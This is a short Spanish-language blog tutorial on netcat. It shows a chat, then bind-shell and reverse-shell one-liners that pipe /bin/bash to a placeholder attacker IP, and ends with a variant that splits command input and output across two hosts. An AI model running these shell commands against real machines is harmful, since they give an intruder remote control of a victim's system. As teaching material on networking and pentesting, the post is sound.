Netcat es una herramienta que por conocerla, la conoce hasta el panero del pueblo, pero como sabéis los que leéis el blog que me gusta tener las cosas documentadas por muy chorras y extra Documentadas que estén por la red, ergo empezaremos hablando que es netcat??, es exactamente lo mismo que el comando cat pero a través de la red, de ahí netcat (no era muy difícil =) )

Para ver el funcionamiento de esta herramienta vamos a poner un servidor en escucha y hacemos un chat:

Nc

Chat: nc -l -p 5000 (Server) && nc [IP] [Port] (Cliente)

Veamos realmente lo que se envía por la red:

nc2

ncPrueba

Paquete enviado por Netcat

Ahora que tenemos un poco la idea del tipo de conexión que se realiza entre las 2 maquinas, por que no en vez de que lo muestre al usuario se lo enchufamos a un comando, como vimos con los Pipes, para conseguir esto basta con cambiar el comando del Server y todo lo que escribamos lo interprete con /bin/bash (en windows seria cmd.exe):

Bind

Bind Shell: nc -l -p 6000 -e /bin/bash (Server) && nc [IP] [PORT] (Cliente)

Vale ahora vamos a la chicha del asunto que es la Shell reversa, y es que en vez de que la victima aguante el peso del Server que dejaría expuesto a un netstat, hagamos que sea la victima el que lanze el comando y te regale la shell a nuestro server maligno =):

reverse

Reverse Shell: nc -e /bin/bash [Ip Atacante] [Port] (Victima) && nc -l -p [Port] (Atacante)

Vamos a hacer un Bonus aunque no tiene mucho sentido, que es redireccionar la salida a otra maquina, en este caso usare la misma maquina pero la segunda parte del comando seria a donde enviar la respuesta del comando:

pipe

Reverse Shell con Redireccion: nc [IP Comandos] [Port] | /bin/bash | nc [IP Salida Comandos] [Port] (Victima) && nc -l -p [port] (Atacante)

CheatSheet

Anuncios

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s